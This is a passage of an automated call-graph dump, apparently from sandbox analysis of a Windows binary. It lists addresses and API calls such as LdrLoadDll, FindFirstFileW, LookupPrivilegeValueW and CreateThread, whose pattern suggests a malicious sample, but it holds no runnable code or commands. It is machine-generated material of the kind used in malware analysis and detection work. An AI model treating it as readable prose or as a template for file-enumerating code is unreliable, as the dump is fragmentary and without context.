2f4d050 LdrLoadDll 83678->83679 83680 2f4d20d 83679->83680 83681 2f4d050 LdrLoadDll 83680->83681 83682 2f4d216 83681->83682 83683 2f4d050 LdrLoadDll 83682->83683 83684 2f4d21f 83683->83684 83685 2f4d050 LdrLoadDll 83684->83685 83686 2f4d228 83685->83686 83687 2f4d050 LdrLoadDll 83686->83687 83688 2f4d231 83687->83688 83689 2f4d050 LdrLoadDll 83688->83689 83690 2f4d23a 83689->83690 83691 2f4d050 LdrLoadDll 83690->83691 83692 2f4d246 83691->83692 83693 2f4d050 LdrLoadDll 83692->83693 83694 2f4d24f 83693->83694 83695 2f4d050 LdrLoadDll 83694->83695 83696 2f4d258 83695->83696 83697 2f4d050 LdrLoadDll 83696->83697 83698 2f4d261 83697->83698 83699 2f4d050 LdrLoadDll 83698->83699 83700 2f4d26a 83699->83700 83701 2f4d050 LdrLoadDll 83700->83701 83702 2f4d273 83701->83702 83703 2f4d050 LdrLoadDll 83702->83703 83704 2f4d27f 83703->83704 83705 2f4d050 LdrLoadDll 83704->83705 83706 2f4d288 83705->83706 83707 2f4d050 LdrLoadDll 83706->83707 83708 2f4d291 83707->83708 83709 2f4d050 LdrLoadDll 83708->83709 83710 2f4d29a 83709->83710 83711 2f4d050 LdrLoadDll 83710->83711 83712 2f4d2a3 83711->83712 83713 2f4d050 LdrLoadDll 83712->83713 83714 2f4d2ac 83713->83714 83715 2f4d050 LdrLoadDll 83714->83715 83716 2f4d2b8 83715->83716 83717 2f4d050 LdrLoadDll 83716->83717 83718 2f4d2c1 83717->83718 83719 2f4d050 LdrLoadDll 83718->83719 83720 2f4d2ca 83719->83720 83721 2f4d050 LdrLoadDll 83720->83721 83722 2f4d2d3 83721->83722 83723 2f4d050 LdrLoadDll 83722->83723 83724 2f4d2dc 83723->83724 83725 2f4d050 LdrLoadDll 83724->83725 83726 2f4d2e5 83725->83726 83727 2f4d050 LdrLoadDll 83726->83727 83728 2f4d2f1 83727->83728 83729 2f4d050 LdrLoadDll 83728->83729 83730 2f4d2fa 83729->83730 83731 2f4d050 LdrLoadDll 83730->83731 83732 2f4d303 83731->83732 83733 2f4d050 LdrLoadDll 83732->83733 83734 2f4d30c 83733->83734 83735 2f4d050 LdrLoadDll 83734->83735 83736 2f4d315 83735->83736 83737 2f4d050 LdrLoadDll 83736->83737 83738 2f4d31e 83737->83738 83739 2f4d050 LdrLoadDll 83738->83739 83740 2f4d32a 83739->83740 83741 2f4d050 LdrLoadDll 83740->83741 83742 2f4d333 83741->83742 83743 2f4d050 LdrLoadDll 83742->83743 83744 2f4d33c 83743->83744 83744->83497 83746 2f4d3d0 LdrLoadDll 83745->83746 83747 2f4c2dc 83746->83747 83774 3982d10 LdrInitializeThunk 83747->83774 83748 2f4c2f3 83748->83429 83750->83494 83752 2f4f3e6 83751->83752 83753 2f4f3e0 83751->83753 83754 2f4e3f0 2 API calls 83752->83754 83753->83627 83755 2f4f40c 83754->83755 83755->83627 83757 2f4f470 83756->83757 83758 2f4f4cd 83757->83758 83759 2f4e3f0 2 API calls 83757->83759 83758->83635 83760 2f4f4aa 83759->83760 83761 2f4e310 2 API calls 83760->83761 83761->83758 83762->83631 83763->83645 83764->83647 83765->83649 83766->83652 83767->83654 83769 2f4d06b 83768->83769 83770 2f47340 LdrLoadDll 83769->83770 83771 2f4d08b 83770->83771 83772 2f47340 LdrLoadDll 83771->83772 83773 2f4d13f 83771->83773 83772->83773 83773->83668 83773->83773 83774->83748 83776 2f371e0 83775->83776 83777 2f371db 83775->83777 83778 2f4e290 2 API calls 83776->83778 83777->83437 83785 2f37205 83778->83785 83779 2f37268 83779->83437 83780 2f4c2c0 2 API calls 83780->83785 83781 2f3726e 83783 2f37294 83781->83783 83784 2f4c9c0 2 API calls 83781->83784 83783->83437 83786 2f37285 83784->83786 83785->83779 83785->83780 83785->83781 83787 2f4e290 2 API calls 83785->83787 83791 2f4c9c0 83785->83791 83786->83437 83787->83785 83789 2f4c9c0 2 API calls 83788->83789 83790 2f374ae 83789->83790 83790->83394 83792 2f4d3d0 LdrLoadDll 83791->83792 83793 2f4c9dc 83792->83793 83794 2f4c9f3 83793->83794 83796 3982b90 LdrInitializeThunk 83793->83796 83794->83785 83796->83794 83798 2f4da93 83797->83798 83799 2f3abd0 LdrLoadDll 83798->83799 83800 2f39afa 83799->83800 83800->83400 83802 2f3af43 83801->83802 83804 2f3afc0 83802->83804 83814 2f4c090 LdrLoadDll 83802->83814 83804->83407 83806 2f4cbdf 83805->83806 83807 2f4d3d0 LdrLoadDll 83806->83807 83808 2f4cbef LookupPrivilegeValueW 83807->83808 83808->83412 83810 2f4d3d0 LdrLoadDll 83809->83810 83811 2f4c67c 83810->83811 83815 3982dc0 LdrInitializeThunk 83811->83815 83812 2f4c69b 83812->83413 83814->83804 83815->83812 83817 2f3b0c7 83816->83817 83818 2f3af20 LdrLoadDll 83817->83818 83819 2f3b12a 83818->83819 83819->83353 83821 2f3ae14 83820->83821 83868 2f4c090 LdrLoadDll 83821->83868 83823 2f3ae4e 83823->83355 83825 2f3de5c 83824->83825 83826 2f3b0a0 LdrLoadDll 83825->83826 83827 2f3de6e 83826->83827 83869 2f3dd00 83827->83869 83830 2f3dea1 83832 2f3deb2 83830->83832 83835 2f4c890 2 API calls 83830->83835 83831 2f3de89 83833 2f3de94 83831->83833 83834 2f4c890 2 API calls 83831->83834 83832->83359 83833->83359 83834->83833 83835->83832 83837 2f3c2f6 83836->83837 83838 2f3c300 83836->83838 83837->83368 83839 2f3af20 LdrLoadDll 83838->83839 83840 2f3c371 83839->83840 83841 2f3adf0 LdrLoadDll 83840->83841 83842 2f3c385 83841->83842 83843 2f3c3a8 83842->83843 83844 2f3af20 LdrLoadDll 83842->83844 83843->83368 83845 2f3c3c4 83844->83845 83846 2f46f30 10 API calls 83845->83846 83847 2f3c419 83846->83847 83847->83368 83888 2f3e0f0 83848->83888 83850 2f38bf1 83850->83357 83851 2f3889a 83851->83850 83893 2f46860 83851->83893 83853 2f4f3d0 2 API calls 83854 2f38a95 83853->83854 83856 2f4f500 3 API calls 83854->83856 83855 2f388f6 83855->83850 83855->83853 83858 2f38aaa 83856->83858 83857 2f371d0 4 API calls 83863 2f38afd 83857->83863 83858->83863 83966 2f33660 12 API calls 83858->83966 83863->83850 83863->83857 83864 2f37490 2 API calls 83863->83864 83896 2f3c010 83863->83896 83946 2f3e090 83863->83946 83950 2f3daf0 83863->83950 83864->83863 83865->83363 83866->83373 83867->83381 83868->83823 83870 2f3dd1a 83869->83870 83878 2f3ddd0 83869->83878 83871 2f3af20 LdrLoadDll 83870->83871 83872 2f3dd3c 83871->83872 83879 2f4c340 83872->83879 83874 2f3dd7e 83882 2f4c380 83874->83882 83877 2f4c890 2 API calls 83877->83878 83878->83830 83878->83831 83880 2f4c35c 83879->83880 83881 2f4d3d0 LdrLoadDll 83879->83881 83880->83874 83881->83880 83883 2f4d3d0 LdrLoadDll 83882->83883 83884 2f4c39c 83883->83884 83887 39834e0 LdrInitializeThunk 83884->83887 83885 2f3ddc4 83885->83877 83887->83885 83889 2f47340 LdrLoadDll 83888->83889 83890 2f3e10f 83889->83890 83891 2f3e116 SetErrorMode 83890->83891 83892 2f3e11d 83890->83892 83891->83892 83892->83851 83967 2f3dec0 83893->83967 83895 2f46886 83895->83855 83897 2f3c02f 83896->83897 83898 2f3c029 83896->83898 83993 2f396d0 83897->83993 83986 2f3d7c0 83898->83986 83901 2f3c03c 83902 2f3c2d2 83901->83902 83903 2f4f500 3 API calls 83901->83903 83902->83863 83904 2f3c058 83903->83904 83905 2f3c06c 83904->83905 83906 2f3e090 2 API calls 83904->83906 83907 2f4c110 LdrLoadDll 83905->83907 83906->83905 83908 2f3c0c0 83907->83908 83908->83902 83909 2f3c1a0 83908->83909 83910 2f4c300 2 API calls 83908->83910 84015 2f3bfb0 LdrLoadDll LdrInitializeThunk 83909->84015 83911 2f3c0ea 83910->83911 83911->83909 83916 2f3c0f6 83911->83916 83913 2f3c1bf 83914 2f3c1c7 83913->83914 84016 2f3bf20 LdrLoadDll NtClose LdrInitializeThunk 83913->84016 83917 2f4c890 2 API calls 83914->83917 83916->83902 83919 2f3c149 83916->83919 83923 2f4c410 2 API calls 83916->83923 83920 2f3c1d1 83917->83920 83918 2f3c1e9 83918->83914 83922 2f3c1f0 83918->83922 83921 2f4c890 2 API calls 83919->83921 83920->83863 83924 2f3c166 83921->83924 83925 2f3c208 83922->83925 84017 2f3bea0 83922->84017 83923->83919 84002 2f4b6e0 83924->84002 84020 2f4c190 LdrLoadDll 83925->84020 83929 2f3c17d 83929->83902 84005 2f37630 83929->84005 83930 2f3c21c 84021 2f3bd20 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 83930->84021 83933 2f3c240 83935 2f3c28d 83933->83935 84022 2f4c1c0 LdrLoadDll 83933->84022 84024 2f4c220 LdrLoadDll 83935->84024 83938 2f3c29b 83940 2f4c890 2 API calls 83938->83940 83939 2f3c25e 83939->83935 84023 2f4c250 LdrLoadDll 83939->84023 83941 2f3c2a5 83940->83941 83942 2f4c890 2 API calls 83941->83942 83944 2f3c2af 83942->83944 83944->83902 83945 2f37630 3 API calls 83944->83945 83945->83902 83947 2f3e0a3 83946->83947 84052 2f4c290 83947->84052 83951 2f3db27 83950->83951 83952 2f3db07 83950->83952 83956 2f3db69 83951->83956 84078 2f3d740 83951->84078 83952->83951 84058 2f3d900 83952->84058 83957 2f3db9b 83956->83957 84100 2f3cfe0 12 API calls 83956->84100 83958 2f3dbc1 83957->83958 84101 2f4ae20 13 API calls 83957->84101 84102 2f348e0 31 API calls 83958->84102 83964 2f3dbd6 83964->83863 83965 2f46f30 10 API calls 83965->83956 83966->83863 83968 2f3dedd 83967->83968 83974 2f4c3c0 83968->83974 83971 2f3df25 83971->83895 83975 2f4d3d0 LdrLoadDll 83974->83975 83976 2f4c3dc 83975->83976 83984 3982e50 LdrInitializeThunk 83976->83984 83977 2f3df1e 83977->83971 83979 2f4c410 83977->83979 83980 2f4d3d0 LdrLoadDll 83979->83980 83981 2f4c42c 83980->83981 83985 3982c30 LdrInitializeThunk 83981->83985 83982 2f3df4e 83982->83895 83984->83977 83985->83982 84025 2f3d060 83986->84025 83988 2f3d8e2 83989 2f4e3f0 2 API calls 83988->83989 83990 2f3d8f1 83989->83990 83990->83897 83991 2f3d7de 83991->83988 84038 2f4b570 83991->84038 83994 2f396eb 83993->83994 83995 2f3dd00 3 API calls 83994->83995 84001 2f3980b 83994->84001 83996 2f397ec 83995->83996 83997 2f3981a 83996->83997 83998 2f39801 83996->83998 83999 2f4c890 2 API calls 83996->83999 83997->83901 84051 2f36320 LdrLoadDll 83998->84051 83999->83998 84001->83901 84003 2f3e090 2 API calls 84002->84003 84004 2f4b712 84003->84004 84004->83929 84006 2f37648 84005->84006 84007 2f3abd0 LdrLoadDll 84006->84007 84008 2f37663 84007->84008 84009 2f47340 LdrLoadDll 84008->84009 84010 2f37673 84009->84010 84011 2f376ad 84010->84011 84012 2f3767c PostThreadMessageW 84010->84012 84011->83863 84012->84011 84013 2f37690 84012->84013 84014 2f3769a PostThreadMessageW 84013->84014 84014->84011 84015->83913 84016->83918 84018 2f4c410 2 API calls 84017->84018 84019 2f3bede 84018->84019 84019->83925 84020->83930 84021->83933 84022->83939 84023->83935 84024->83938 84026 2f3d093 84025->84026 84043 2f3b210 84026->84043 84028 2f3d0a5 84047 2f3b380 84028->84047 84030 2f3d0c3 84031 2f3b380 LdrLoadDll 84030->84031 84032 2f3d0d9 84031->84032 84033 2f3dec0 3 API calls 84032->84033 84034 2f3d10f 84033->84034 84035 2f3d116 84034->84035 84050 2f4e430 LdrLoadDll RtlAllocateHeap 84034->84050 84035->83991 84037 2f3d126 84037->83991 84039 2f47340 LdrLoadDll 84038->84039 84040 2f4b591 84039->84040 84041 2f4b5b7 84040->84041 84042 2f4b5a4 CreateThread 84040->84042 84041->83988 84042->83988 84044 2f3b237 84043->84044 84045 2f3af20 LdrLoadDll 84044->84045 84046 2f3b273 84045->84046 84046->84028 84048 2f3af20 LdrLoadDll 84047->84048 84049 2f3b399 84048->84049 84049->84030 84050->84037 84051->84001 84053 2f4d3d0 LdrLoadDll 84052->84053 84054 2f4c2ac 84053->84054 84057 3982cf0 LdrInitializeThunk 84054->84057 84055 2f3e0ce 84055->83863 84057->84055 84059 2f3d930 84058->84059 84103 2f46220 84059->84103 84061 2f3d97e 84141 2f45000 84061->84141 84063 2f3d984 84177 2f41eb0 84063->84177 84065 2f3d98a 84208 2f44090 84065->84208 84071 2f3d99e 84253 2f458a0 84071->84253 84073 2f3d9a4 84279 2f3fa30 84073->84279 84075 2f3d9bc 84290 2f40a80 84075->84290 84079 2f3d758 84078->84079 84083 2f3d7af 84078->84083 84080 2f40cd0 10 API calls 84079->84080 84079->84083 84081 2f3d799 84080->84081 84081->84083 84617 2f40f20 84081->84617 84083->83964 84084 2f3d580 84083->84084 84086 2f3d59c 84084->84086 84099 2f3d67b 84084->84099 84085 2f3d70e 84087 2f3d72b 84085->84087 84090 2f46f30 10 API calls 84085->84090 84088 2f4c890 2 API calls 84086->84088 84086->84099 84087->83956 84087->83965 84089 2f3d5bd 84088->84089 84677 2f3c980 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 84089->84677 84090->84087 84092 2f3d6e8 84092->84085 84679 2f3cb40 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 84092->84679 84094 2f3d5f5 84096 2f3af20 LdrLoadDll 84094->84096 84097 2f3d606 84096->84097 84098 2f3af20 LdrLoadDll 84097->84098 84098->84099 84099->84085 84678 2f3c980 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 84099->84678 84100->83957 84101->83958 84102->83964 84104 2f46248 84103->84104 84105 2f3af20 LdrLoadDll 84104->84105 84106 2f46277 84105->84106 84107 2f3c750 3 API calls 84106->84107 84109 2f462aa 84107->84109 84108 2f462b1 84108->84061 84109->84108 84110 2f3af20 LdrLoadDll 84109->84110 84111 2f462d9 84110->84111 84112 2f3af20 LdrLoadDll 84111->84112 84113 2f462fd 84112->84113 84295 2f3c810 84113->84295 84116 2f46363 84120 2f3af20 LdrLoadDll 84116->84120 84118 2f4633a 84119 2f464e6 84118->84119 84303 2f45f70 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 84118->84303 84119->84061 84122 2f46383 84120->84122 84123 2f3c810 2 API calls 84122->84123 84124 2f463a7 84123->84124 84125 2f463ed 84124->84125 84126 2f463c4 84124->84126 84128 2f45b80 10 API calls 84124->84128 84127 2f3c810 2 API calls 84125->84127 84126->84119 84304 2f45f70 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 84126->84304 84130 2f4641d 84127->84130 84128->84126 84131 2f46463 84130->84131 84132 2f4643a 84130->84132 84134 2f45b80 10 API calls 84130->84134 84135 2f3c810 2 API calls 84131->84135 84132->84119 84305 2f45f70 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 84132->84305 84134->84132 84136 2f464c2 84135->84136 84138 2f45b80 10 API calls 84136->84138 84139 2f4650b 84136->84139 84140 2f464df 84136->84140 84138->84140 84139->84061 84140->84119 84306 2f45f70 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 84140->84306 84142 2f45064 84141->84142 84143 2f3af20 LdrLoadDll 84142->84143 84144 2f45131 84143->84144 84145 2f3c750 3 API calls 84144->84145 84147 2f45164 84145->84147 84146 2f4516b 84146->84063 84147->84146 84148 2f3af20 LdrLoadDll 84147->84148 84149 2f45193 84148->84149 84150 2f3c810 2 API calls 84149->84150 84151 2f451d3 84150->84151 84152 2f452f3 84151->84152 84153 2f45b80 10 API calls 84151->84153 84152->84063 84154 2f451f0 84153->84154 84155 2f45302 84154->84155 84313 2f44e20 84154->84313 84156 2f4c890 2 API calls 84155->84156 84158 2f4530c 84156->84158 84158->84063 84159 2f45208 84159->84155 84160 2f45213 84159->84160 84161 2f4e3f0 2 API calls 84160->84161 84162 2f4523c 84161->84162 84163 2f45245 84162->84163 84164 2f4525b 84162->84164 84165 2f4c890 2 API calls 84163->84165 84342 2f44d10 CoInitialize 84164->84342 84167 2f4524f 84165->84167 84167->84063 84168 2f45269 84344 2f4c5a0 84168->84344 84170 2f452e2 84171 2f4c890 2 API calls 84170->84171 84172 2f452ec 84171->84172 84174 2f4e310 2 API calls 84172->84174 84174->84152 84175 2f45287 84175->84170 84176 2f4c5a0 2 API calls 84175->84176 84349 2f44c40 LdrLoadDll RtlFreeHeap 84175->84349 84176->84175 84178 2f41ed8 84177->84178 84179 2f4e3f0 2 API calls 84178->84179 84180 2f41f38 84179->84180 84181 2f41f41 84180->84181 84351 2f41310 84180->84351 84181->84065 84183 2f41f6a 84184 2f41f8a 84183->84184 84381 2f41620 LdrLoadDll 84183->84381 84185 2f41fa8 84184->84185 84383 2f43b90 13 API calls 84184->84383 84193 2f41fc2 84185->84193 84385 2f3ad20 LdrLoadDll 84185->84385 84188 2f41f78 84188->84184 84382 2f41c30 10 API calls 84188->84382 84189 2f41f9c 84384 2f43b90 13 API calls 84189->84384 84194 2f41310 12 API calls 84193->84194 84195 2f41fef 84194->84195 84196 2f42010 84195->84196 84386 2f41620 LdrLoadDll 84195->84386 84198 2f4202e 84196->84198 84388 2f43b90 13 API calls 84196->84388 84201 2f42048 84198->84201 84390 2f3ad20 LdrLoadDll 84198->84390 84199 2f41ffe 84199->84196 84387 2f41c30 10 API calls 84199->84387 84203 2f4e310 2 API calls 84201->84203 84205 2f42052 84203->84205 84204 2f42022 84389 2f43b90 13 API calls 84204->84389 84205->84065 84209 2f440b6 84208->84209 84210 2f3af20 LdrLoadDll 84209->84210 84211 2f440e5 84210->84211 84212 2f3af20 LdrLoadDll 84211->84212 84213 2f44111 84211->84213 84212->84213 84410 2f3e2e0 84213->84410 84215 2f441f5 84216 2f3d992 84215->84216 84415 2f3e320 84215->84415 84426 2f43da0 84215->84426 84219 2f45320 84216->84219 84220 2f44090 13 API calls 84219->84220 84221 2f3d998 84220->84221 84222 2f42db0 84221->84222 84223 2f42dd2 84222->84223 84224 2f3af20 LdrLoadDll 84223->84224 84225 2f42f9d 84224->84225 84226 2f3af20 LdrLoadDll 84225->84226 84227 2f42fae 84226->84227 84228 2f3adf0 LdrLoadDll 84227->84228 84229 2f42fc5 84228->84229 84506 2f42c80 84229->84506 84232 2f42c80 13 API calls 84233 2f4303b 84232->84233 84234 2f42c80 13 API calls 84233->84234 84235 2f43053 84234->84235 84236 2f42c80 13 API calls 84235->84236 84237 2f4306b 84236->84237 84238 2f42c80 13 API calls 84237->84238 84239 2f43083 84238->84239 84240 2f42c80 13 API calls 84239->84240 84241 2f4309e 84240->84241 84242 2f430b8 84241->84242 84243 2f42c80 13 API calls 84241->84243 84242->84071 84244 2f430ec 84243->84244 84245 2f42c80 13 API calls 84244->84245 84246 2f43129 84245->84246 84247 2f42c80 13 API calls 84246->84247 84248 2f43166 84247->84248 84249 2f42c80 13 API calls 84248->84249 84250 2f431a3 84249->84250 84251 2f42c80 13 API calls 84250->84251 84252 2f431e0 84251->84252 84252->84071 84254 2f458bd 84253->84254 84255 2f3abd0 LdrLoadDll 84254->84255 84256 2f458d8 84255->84256 84257 2f47340 LdrLoadDll 84256->84257 84276 2f45aa6 84256->84276 84258 2f45902 84257->84258 84259 2f47340 LdrLoadDll 84258->84259 84260 2f45915 84259->84260 84261 2f47340 LdrLoadDll 84260->84261 84262 2f45928 84261->84262 84263 2f47340 LdrLoadDll 84262->84263 84264 2f4593b 84263->84264 84265 2f47340 LdrLoadDll 84264->84265 84266 2f45951 84265->84266 84267 2f47340 LdrLoadDll 84266->84267 84268 2f45964 84267->84268 84269 2f47340 LdrLoadDll 84268->84269 84270 2f45977 84269->84270 84271 2f47340 LdrLoadDll 84270->84271 84272 2f4598a 84271->84272 84273 2f47340 LdrLoadDll 84272->84273 84274 2f4599f 84273->84274 84275 2f45b80 10 API calls 84274->84275 84274->84276 84278 2f45a21 84275->84278 84276->84073 84278->84276 84521 2f45460 LdrLoadDll 84278->84521 84280 2f3fa40 84279->84280 84281 2f3fa4b 84279->84281 84283 2f4e3f0 2 API calls 84280->84283 84522 2f3e740 84281->84522 84283->84281 84284 2f3fa61 84284->84075 84286 2f3fa5a 84286->84284 84287 2f3fa80 84286->84287 84531 2f3f7d0 84286->84531 84288 2f4e310 2 API calls 84287->84288 84289 2f3fa98 84287->84289 84288->84289 84289->84075 84550 2f40800 84290->84550 84292 2f40a8d 84573 2f404e0 84292->84573 84294 2f3d9ce 84294->83951 84296 2f3c835 84295->84296 84307 2f4c490 84296->84307 84299 2f45b80 84300 2f45bfd 84299->84300 84301 2f46f30 10 API calls 84300->84301 84302 2f45d79 84300->84302 84301->84302 84302->84118 84303->84116 84304->84125 84305->84131 84306->84139 84308 2f4d3d0 LdrLoadDll 84307->84308 84309 2f4c4ac 84308->84309 84312 3982b80 LdrInitializeThunk 84309->84312 84310 2f3c8a9 84310->84116 84310->84299 84312->84310 84314 2f44e3c 84313->84314 84315 2f3abd0 LdrLoadDll 84314->84315 84316 2f44e57 84315->84316 84317 2f44e60 84316->84317 84318 2f47340 LdrLoadDll 84316->84318 84317->84159 84319 2f44e77 84318->84319 84320 2f47340 LdrLoadDll 84319->84320 84321 2f44e8c 84320->84321 84322 2f47340 LdrLoadDll 84321->84322 84323 2f44e9f 84322->84323 84324 2f47340 LdrLoadDll 84323->84324 84325 2f44eb2 84324->84325 84326 2f47340 LdrLoadDll 84325->84326 84327 2f44ec8 84326->84327 84328 2f47340 LdrLoadDll 84327->84328 84329 2f44edb 84328->84329 84330 2f3abd0 LdrLoadDll 84329->84330 84332 2f44f04 84330->84332 84331 2f44fa0 84331->84159 84332->84331 84333 2f47340 LdrLoadDll 84332->84333 84334 2f44f28 84333->84334 84335 2f3abd0 LdrLoadDll 84334->84335 84336 2f44f5d 84335->84336 84336->84331 84337 2f47340 LdrLoadDll 84336->84337 84338 2f44f7a 84337->84338 84339 2f47340 LdrLoadDll 84338->84339 84340 2f44f8d 84339->84340 84341 2f47340 LdrLoadDll 84340->84341 84341->84331 84343 2f44d75 84342->84343 84343->84168 84345 2f4d3d0 LdrLoadDll 84344->84345 84346 2f4c5bc 84345->84346 84350 3982ac0 LdrInitializeThunk 84346->84350 84347 2f4c5db 84347->84175 84349->84175 84350->84347 84352 2f4136a 84351->84352 84353 2f3af20 LdrLoadDll 84352->84353 84354 2f41446 84353->84354 84355 2f3af20 LdrLoadDll 84354->84355 84356 2f41461 84355->84356 84357 2f3c810 2 API calls 84356->84357 84358 2f41486 84357->84358 84359 2f415cd 84358->84359 84403 2f4c520 84358->84403 84361 2f415de 84359->84361 84391 2f40cd0 84359->84391 84361->84183 84364 2f415c3 84365 2f4c890 2 API calls 84364->84365 84365->84359 84366 2f414bf 84367 2f4c890 2 API calls 84366->84367 84368 2f414f9 84367->84368 84408 2f4e4c0 LdrLoadDll 84368->84408 84370 2f4152f 84370->84361 84371 2f3c810 2 API calls 84370->84371 84372 2f41555 84371->84372 84372->84361 84373 2f4c520 2 API calls 84372->84373 84374 2f4157a 84373->84374 84375 2f41581 84374->84375 84376 2f415ad 84374->84376 84377 2f4c890 2 API calls 84375->84377 84378 2f4c890 2 API calls 84376->84378 84380 2f4158b 84377->84380 84379 2f415b7 84378->84379 84379->84183 84380->84183 84381->84188 84382->84184 84383->84189 84384->84185 84385->84193 84386->84199 84387->84196 84388->84204 84389->84198 84390->84201 84392 2f40cf5 84391->84392 84393 2f3af20 LdrLoadDll 84392->84393 84394 2f40db0 84393->84394 84395 2f3af20 LdrLoadDll 84394->84395 84396 2f40dd4 84395->84396 84397 2f46f30 10 API calls 84396->84397 84399 2f40e27 84397->84399 84398 2f40ee1 84398->84361 84399->84398 84400 2f3af20 LdrLoadDll 84399->84400 84401 2f40e8e 84400->84401 84402 2f46f30 10 API calls 84401->84402 84402->84398 84404 2f4c53c 84403->84404 84405 2f4d3d0 LdrLoadDll 84403->84405 84409 3982b00 LdrInitializeThunk 84404->84409 84405->84404 84406 2f414b4 84406->84364 84406->84366 84408->84370 84409->84406 84411 2f47340 LdrLoadDll 84410->84411 84412 2f3e2ff 84411->84412 84413 2f3e306 GetFileAttributesW 84412->84413 84414 2f3e311 84412->84414 84413->84414 84414->84215 84416 2f3e6d2 84415->84416 84417 2f3e335 84415->84417 84416->84215 84417->84416 84418 2f46f30 10 API calls 84417->84418 84419 2f3e65d 84418->84419 84419->84416 84420 2f46f30 10 API calls 84419->84420 84421 2f3e691 84420->84421 84421->84416 84422 2f3e6a3 84421->84422 84424 2f3e6e2 84421->84424 84423 2f46f30 10 API calls 84422->84423 84423->84416 84424->84416 84425 2f46f30 10 API calls 84424->84425 84425->84416 84450 2f4aba0 84426->84450 84428 2f43e0b 84428->84215 84429 2f43db6 84429->84428 84430 2f43dd5 84429->84430 84431 2f43e17 84429->84431 84433 2f43ddd 84430->84433 84434 2f43dfa 84430->84434 84432 2f3af20 LdrLoadDll 84431->84432 84436 2f43e28 84432->84436 84437 2f4e310 2 API calls 84433->84437 84435 2f4e310 2 API calls 84434->84435 84435->84428 84439 2f46f30 10 API calls 84436->84439 84438 2f43dee 84437->84438 84438->84215 84440 2f43e3f 84439->84440 84490 2f431f0 84440->84490 84442 2f43e4a 84446 2f43f48 84442->84446 84447 2f43e62 84442->84447 84443 2f43f2f 84444 2f4e310 2 API calls 84443->84444 84445 2f44053 84444->84445 84445->84215 84446->84443 84501 2f43780 12 API calls 84446->84501 84447->84443 84500 2f43780 12 API calls 84447->84500 84451 2f4abae 84450->84451 84452 2f4abb5 84450->84452 84451->84429 84453 2f3abd0 LdrLoadDll 84452->84453 84454 2f4abe7 84453->84454 84455 2f4abf6 84454->84455 84502 2f4a690 LdrLoadDll 84454->84502 84457 2f4e3f0 2 API calls 84455->84457 84459 2f4adaf 84455->84459 84458 2f4ac0f 84457->84458 84458->84459 84460 2f4ac24 84458->84460 84461 2f4ad5e 84458->84461 84459->84429 84503 2f432d0 LdrLoadDll 84460->84503 84462 2f4ae01 84461->84462 84463 2f4ad68 84461->84463 84465 2f4e310 2 API calls 84462->84465 84504 2f432d0 LdrLoadDll 84463->84504 84465->84459 84467 2f4ac3b 84469 2f47340 LdrLoadDll 84467->84469 84468 2f4ad7f 84505 2f4a020 LdrLoadDll 84468->84505 84471 2f4ac51 84469->84471 84473 2f47340 LdrLoadDll 84471->84473 84472 2f4ad95 84476 2f47340 LdrLoadDll 84472->84476 84474 2f4ac67 84473->84474 84475 2f47340 LdrLoadDll 84474->84475 84477 2f4ac7d 84475->84477 84476->84459 84478 2f47340 LdrLoadDll 84477->84478 84479 2f4ac96 84478->84479 84480 2f47340 LdrLoadDll 84479->84480 84481 2f4acac 84480->84481 84482 2f47340 LdrLoadDll 84481->84482 84483 2f4acc2 84482->84483 84484 2f47340 LdrLoadDll 84483->84484 84485 2f4acd8 84484->84485 84486 2f47340 LdrLoadDll 84485->84486 84487 2f4acfe 84486->84487 84487->84459 84488 2f4e310 2 API calls 84487->84488 84489 2f4ad52 84488->84489 84489->84429 84491 2f46f30 10 API calls 84490->84491 84492 2f43206 84491->84492 84493 2f43213 84492->84493 84494 2f46f30 10 API calls 84492->84494 84493->84442 84495 2f43224 84494->84495 84495->84493 84496 2f46f30 10 API calls 84495->84496 84497 2f4323f 84496->84497 84498 2f4e310 2 API calls 84497->84498 84499 2f4324c 84498->84499 84499->84442 84500->84447 84501->84446 84502->84455 84503->84467 84504->84468 84505->84472 84507 2f42ca9 84506->84507 84508 2f47340 LdrLoadDll 84507->84508 84509 2f42ce0 84508->84509 84510 2f47340 LdrLoadDll 84509->84510 84511 2f42cf8 84510->84511 84512 2f47340 LdrLoadDll 84511->84512 84514 2f42d14 84512->84514 84513 2f42d9c 84513->84232 84514->84513 84515 2f42d3e FindFirstFileW 84514->84515 84515->84513 84519 2f42d59 84515->84519 84516 2f42d83 FindNextFileW 84518 2f42d95 FindClose 84516->84518 84516->84519 84518->84513 84519->84516 84520 2f42b60 13 API calls 84519->84520 84520->84519 84521->84278 84523 2f3e760 84522->84523 84524 2f3e758 84522->84524 84525 2f4aba0 3 API calls 84523->84525 84524->84286 84526 2f3e773 84525->84526 84526->84524 84527 2f3af20 LdrLoadDll 84526->84527 84528 2f3e7fd 84527->84528 84529 2f3af20 LdrLoadDll 84528->84529 84530 2f3e80e 84529->84530 84530->84286 84532 2f3f7f7 84531->84532 84533 2f47340 LdrLoadDll 84532->84533 84534 2f3f8a6 84533->84534 84535 2f3f8b1 GetFileAttributesW 84534->84535 84536 2f3fa1f 84534->84536 84535->84536 84540 2f3f8c3 84535->84540 84536->84286 84537 2f3e320 10 API calls 84537->84540 84539 2f3af20 LdrLoadDll 84539->84540 84540->84536 84540->84537 84540->84539 84541 2f431f0 10 API calls 84540->84541 84544 2f4aa40 84540->84544 84548 2f4a8d0 12 API calls 84540->84548 84549 2f4a770 12 API calls 84540->84549 84541->84540 84545 2f4aa56 84544->84545 84547 2f4ab56 84544->84547 84546 2f46f30 10 API calls 84545->84546 84545->84547 84546->84545 84547->84540 84548->84540 84549->84540 84551 2f40825 84550->84551 84552 2f3af20 LdrLoadDll 84551->84552 84553 2f4088a 84552->84553 84554 2f3af20 LdrLoadDll 84553->84554 84555 2f408d8 84554->84555 84556 2f3e2e0 2 API calls 84555->84556 84557 2f4091f 84556->84557 84558 2f40926 84557->84558 84559 2f4aba0 3 API calls 84557->84559 84558->84292 84561 2f40934 84559->84561 84560 2f4093d 84560->84292 84561->84560 84562 2f3af20 LdrLoadDll 84561->84562 84565 2f4098c 84562->84565 84563 2f3e320 10 API 